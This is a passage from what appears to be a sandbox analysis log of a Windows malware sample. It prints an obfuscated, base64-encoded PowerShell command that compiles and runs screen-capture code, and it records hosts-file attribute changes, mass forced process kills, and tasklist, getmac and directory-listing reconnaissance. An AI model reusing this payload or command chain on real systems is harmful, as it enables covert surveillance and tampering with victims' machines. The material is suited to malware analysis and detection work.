JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:6740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7872
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jz12h2lv\jz12h2lv.cmdline"
        5⤵
        
        PID:3096
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6C5.tmp" "c:\Users\Admin\AppData\Local\Temp\jz12h2lv\CSCAE7D983ADF4A455AAECA8B71721A119.TMP"
        6⤵
        
        PID:7048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6644
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:7952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5596
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:7992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2068
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:7556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5460
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:6728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2536"
    3⤵
    PID:8016
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2536
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:8096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:7888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:7816
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:7692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3016"
    3⤵
    PID:8136
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3016
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:7572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:8100
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:7704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:7640
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4380"
    3⤵
    PID:6240
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4380
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:7456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5116"
    3⤵
    PID:6460
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5116
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 692"
    3⤵
    PID:7756
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 692
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:7804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2536"
    3⤵
    PID:7292
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2536
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:8048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4932"
    3⤵
    PID:6840
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4932
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:7304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3016"
    3⤵
    PID:5928
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3016
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:7988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1600"
    3⤵
    PID:7796
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1600
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:6704
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4380"
    3⤵
    PID:7488
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4380
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1144"
    3⤵
    PID:6444
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1144
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5116"
    3⤵
    PID:8156
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5116
      4⤵
      Kills process with taskkill
      PID:6644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2328"
    3⤵
    PID:6688
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2328
      4⤵
      Kills process with taskkill
      PID:8172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 692"
    3⤵
    PID:800
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 692
      4⤵
      Kills process with taskkill
      PID:496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4932"
    3⤵
    PID:6612
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4932
      4⤵
      Kills process with taskkill
      PID:7212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2148"
    3⤵
    PID:7020
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2148
      4⤵
      Kills process with taskkill
      PID:7608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1600"
    3⤵
    PID:4136
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1600
      4⤵
      Kills process with taskkill
      PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3152"
    3⤵
    PID:712
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3152
      4⤵
      Kills process with taskkill
      PID:5828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1144"
    3⤵
    PID:1960
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1144
      4⤵
      Kills process with taskkill
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1428"
    3⤵
    PID:4536
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1428
      4⤵
      Kills process with taskkill
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2328"
    3⤵
    PID:7352
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2328
      4⤵
      Kills process with taskkill
      PID:7928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1176"
    3⤵
    PID:5052
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1176
      4⤵
      Kills process with taskkill
      PID:7604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2148"
    3⤵
    PID:7200
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2148
      4⤵
      Kills process with taskkill
      PID:7556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2380"
    3⤵
    PID:7180
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2380
      4⤵
      Kills process with taskkill
      PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3152"
    3⤵
    PID:3768
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3152
      4⤵
      Kills process with taskkill
      PID:7880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3968"
    3⤵
    PID:3788
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3968
      4⤵
      Kills process with taskkill
      PID:7236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1428"
    3⤵
    PID:6368
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1428
      4⤵
      Kills process with taskkill
      PID:6088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2300"
    3⤵
    PID:7700
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2300
      4⤵
      Kills process with taskkill
      PID:7188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1176"
    3⤵
    PID:6652
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1176
      4⤵
      Kills process with taskkill
      PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2944"
    3⤵
    PID:1664
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2944
      4⤵
      Kills process with taskkill
      PID:8004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2380"
    3⤵
    PID:1360
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2380
      4⤵
      Kills process with taskkill
      PID:7436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5056"
    3⤵
    PID:7432
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5056
      4⤵
      Kills process with taskkill
      PID:7964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3968"
    3⤵
    PID:7232
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3968
      4⤵
      Kills process with taskkill
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1324"
    3⤵
    PID:7716
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1324
      4⤵
      Kills process with taskkill
      PID:8084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2300"
    3⤵
    PID:5516
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2300
      4⤵
      Kills process with taskkill
      PID:7624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 500"
    3⤵
    PID:7360
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 500
      4⤵
      Kills process with taskkill
      PID:6632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2944"
    3⤵
    PID:6400
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2944
      4⤵
      Kills process with taskkill
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 708"
    3⤵
    PID:6332
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7020
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 708
      4⤵
      Kills process with taskkill
      PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5056"
    3⤵
    PID:4900
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5056
      4⤵
      Kills process with taskkill
      PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4340"
    3⤵
    PID:7324
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4340
      4⤵
      Kills process with taskkill
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1324"
    3⤵
    PID:6564
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1324
      4⤵
      Kills process with taskkill
      PID:7024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5348"
    3⤵
    PID:7980
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5348
      4⤵
      Kills process with taskkill
      PID:7144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 500"
    3⤵
    PID:4136
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 500
      4⤵
      Kills process with taskkill
      PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5372"
    3⤵
    PID:1776
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5372
      4⤵
      Kills process with taskkill
      PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 708"
    3⤵
    PID:960
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 708
      4⤵
      Kills process with taskkill
      PID:2172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5424"
    3⤵
    PID:7492
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5424
      4⤵
      Kills process with taskkill
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4340"
    3⤵
    PID:4508
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4340
      4⤵
      Kills process with taskkill
      PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5536"
    3⤵
    PID:6116
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5536
      4⤵
      Kills process with taskkill
      PID:7292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5348"
    3⤵
    PID:7352
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5348
      4⤵
      Kills process with taskkill
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6256"
    3⤵
    PID:8116
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 6256
      4⤵
      Kills process with taskkill
      PID:6620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5372"
    3⤵
    PID:2012
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5372
      4⤵
      Kills process with taskkill
      PID:6348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6984"
    3⤵
    PID:7752
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 6984
      4⤵
      Kills process with taskkill
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5424"
    3⤵
    PID:7004
  - - C:\Windows\system32\taskkill.exe
